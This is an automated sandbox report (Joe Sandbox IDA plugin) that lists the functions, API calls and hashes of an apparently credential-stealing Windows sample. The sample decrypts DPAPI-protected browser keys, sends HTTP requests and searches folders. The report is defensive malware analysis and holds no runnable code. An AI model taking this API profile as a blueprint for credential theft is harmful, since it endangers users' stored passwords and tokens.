Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
String ID: $"encrypted_key":"$DPAPI
API String ID: 2100535398-738592651
Opcode ID: ca33ae688011039fcf64a449318a648078da8d104327d329b4d501a73382307d
Instruction ID: 31d31855f19f4c65a27c5d497bb39ed8b5f8c3206a0a476e89d569b7ca430152
Opcode Fuzzy Hash: ca33ae688011039fcf64a449318a648078da8d104327d329b4d501a73382307d
Instruction Fuzzy Hash: 86311EB6D10209ABCF14DBE4DD85FEFB7B8BB48304F144519EA05A7242EB359A04CBA1

Function 00AC6AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,005E8988,?,00AD110C,?,00000000,?,00AD1110,?,00000000,00AD0AEF), ref: 00AC6ACA
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00AC6AE8
CloseHandle.KERNEL32(00000000), ref: 00AC6AF9
Sleep.KERNEL32(00001770), ref: 00AC6B04
CloseHandle.KERNEL32(?,00000000,?,005E8988,?,00AD110C,?,00000000,?,00AD1110,?,00000000,00AD0AEF), ref: 00AC6B1A
ExitProcess.KERNEL32 ref: 00AC6B22

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$CreateExitOpenProcessSleep
String ID:
API String ID: 941982115-0
Opcode ID: 85d8d8f2650ddcdfef71294278c2cac93a7bd047e44763e279b99ec5f208d3e9
Instruction ID: 16100cf3210046d088522451473133583bf8a5417c779b968c740745a746bee1
Opcode Fuzzy Hash: 85d8d8f2650ddcdfef71294278c2cac93a7bd047e44763e279b99ec5f208d3e9
Instruction Fuzzy Hash: B6F05EB0940209ABE700EBA0DD06FBEBB74EB18741F11851DB506A51D1DBB06940DA97

Function 00AB47B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00AB4839
InternetCrackUrlA.WININET(00000000,00000000), ref: 00AB4849

Strings

<, xrefs: 00AB47C9

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: CrackInternetlstrlen
String ID: <
API String ID: 1274457161-4251816714
Opcode ID: bc4ffdf1afce10c0a2bd72b20888d466edb4c028673689654acf3c06c8e4d4cd
Instruction ID: 491e8613cec386942e8fe3e65088b4338653d90cc7c7e48dd61528b67870c23d
Opcode Fuzzy Hash: bc4ffdf1afce10c0a2bd72b20888d466edb4c028673689654acf3c06c8e4d4cd
Instruction Fuzzy Hash: 18214FB1D00209ABDF14EFA5E945BEE7B75FB44324F108629F915A72D0EB706A09CF81

Function 00AC51F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 00ACA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00ACA7E6

Part of subcall function 00AB6280: InternetOpenA.WININET(00AD0DFE,00000001,00000000,00000000,00000000), ref: 00AB62E1
Part of subcall function 00AB6280: StrCmpCA.SHLWAPI(?,005EFB80), ref: 00AB6303
Part of subcall function 00AB6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00AB6335
Part of subcall function 00AB6280: HttpOpenRequestA.WININET(00000000,GET,?,005EF198,00000000,00000000,00400100,00000000), ref: 00AB6385
Part of subcall function 00AB6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00AB63BF
Part of subcall function 00AB6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00AB63D1

StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00AC5228

Strings

ERROR, xrefs: 00AC521A
ERROR, xrefs: 00AC5273

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
String ID: ERROR$ERROR
API String ID: 3287882509-2579291623
Opcode ID: e2b061aa642776d4ddc28da84b3629427a7b729fd437eb51c6544ae018115280
Instruction ID: f2873dd33a2598fbd497b9934a4b50c6043526454a51571b1aa834124e2198ff
Opcode Fuzzy Hash: e2b061aa642776d4ddc28da84b3629427a7b729fd437eb51c6544ae018115280
Instruction Fuzzy Hash: 1411F530900008ABCB14FB60DA52FFD7378AF60344F814558B80A5A592EF30AB06CB92

Function 00AC4F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00AC8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00AC8E0B

lstrcat.KERNEL32(?,00000000), ref: 00AC4F7A
lstrcat.KERNEL32(?,00AD1070), ref: 00AC4F97
lstrcat.KERNEL32(?,005E8C78), ref: 00AC4FAB
lstrcat.KERNEL32(?,00AD1074), ref: 00AC4FBD

Part of subcall function 00AC4910: wsprintfA.USER32 ref: 00AC492C
Part of subcall function 00AC4910: FindFirstFileA.KERNEL32(?,?), ref: 00AC4943

Part of subcall function 00AC4910: StrCmpCA.SHLWAPI(?,00AD0FDC), ref: 00AC4971
Part of subcall function 00AC4910: StrCmpCA.SHLWAPI(?,00AD0FE0), ref: 00AC4987
Part of subcall function 00AC4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00AC4B7D
Part of subcall function 00AC4910: FindClose.KERNEL32(000000FF), ref: 00AC4B92

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
String ID:
API String ID: 2667927680-0
Opcode ID: 709580b7ef49fac4cf1a5bbf6d5e801f21b2c4af2b159bd4e56a884138c3f611
Instruction ID: cae492580a9b8c6f7eea0ac7587e6ae51b42c3691642735c6615c07baa5df436
Opcode Fuzzy Hash: 709580b7ef49fac4cf1a5bbf6d5e801f21b2c4af2b159bd4e56a884138c3f611
Instruction Fuzzy Hash: BA21B3B690020867C754FBB0DD46FFD737CAB58340F004548B65E96181EEB4AAC8CBA3

Function 00AC0740 Relevance: 4.7, APIs: 3, Instructions: 217COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,005E8BF8), ref: 00AC079A
StrCmpCA.SHLWAPI(00000000,005E8B38), ref: 00AC0866
StrCmpCA.SHLWAPI(00000000,005E8B18), ref: 00AC099D

Part of subcall function 00ACA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00ACA7E6

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 90704f9334245c9b687061113dd6595c39ecdaa37bdf361ada98356bcff72880
Instruction ID: ae61500a694392a3fe6d1760a0a93aa0d09f25cde9e69d66000983f304162379
Opcode Fuzzy Hash: 90704f9334245c9b687061113dd6595c39ecdaa37bdf361ada98356bcff72880
Instruction Fuzzy Hash: 6E913775A101089FCB28EF64DA95FFDB7B9BF94304F51851DE80A9F241DB309A05CB92

Function 00AC0765 Relevance: 4.7, APIs: 3, Instructions: 197COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,005E8BF8), ref: 00AC079A
StrCmpCA.SHLWAPI(00000000,005E8B38), ref: 00AC0866
StrCmpCA.SHLWAPI(00000000,005E8B18), ref: 00AC099D

Part of subcall function 00ACA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00ACA7E6

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: ab4a85318140fb9df4cbb94fb89214c4a7c58ecb03eccc966ba1a2f4ce72cdc9
Instruction ID: f2e5195606c0add5258be33a2072c49dd1bac99c6c813323b7abe11e82ae8c55
Opcode Fuzzy Hash: ab4a85318140fb9df4cbb94fb89214c4a7c58ecb03eccc966ba1a2f4ce72cdc9
Instruction Fuzzy Hash: 68814375A102089FCB28EF64DA95FEDB7B5BF94304F51851DE80A9B241DA30AA05CB92

Function 00F72B0B Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00F73676
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00F7370A

Strings

V, xrefs: 00F736E7

Memory Dump Source

Source File: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree
String ID: V
API String ID: 2087232378-1342839628
Opcode ID: 989c7e9959b38dbac2edd5614487651e89b132b72a4d296ec6e675dd7d9238df
Instruction ID: 878ddedf854bf99ccd2f4727e31a282199ffca75796d3701b8bdb1af475abd82
Opcode Fuzzy Hash: 989c7e9959b38dbac2edd5614487651e89b132b72a4d296ec6e675dd7d9238df
Instruction Fuzzy Hash: C5418FB560424EEFEB14DF18CC88B9F33A4EB08314F144125ED09C7B91E7759D24EA59

Function 6CAD3060 Relevance: 4.5, APIs: 3, Instructions: 36timeCOMMON

Download Yara Rule

APIs

?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6CAD3095

Part of subcall function 6CAD35A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6CB5F688,00001000), ref: 6CAD35D5
Part of subcall function 6CAD35A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6CAD35E0
Part of subcall function 6CAD35A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6CAD35FD
Part of subcall function 6CAD35A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6CAD363F
Part of subcall function 6CAD35A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6CAD369F
Part of subcall function 6CAD35A0: __aulldiv.LIBCMT ref: 6CAD36E4

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CAD309F

Part of subcall function 6CAF5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6CAF56EE,?,00000001), ref: 6CAF5B85
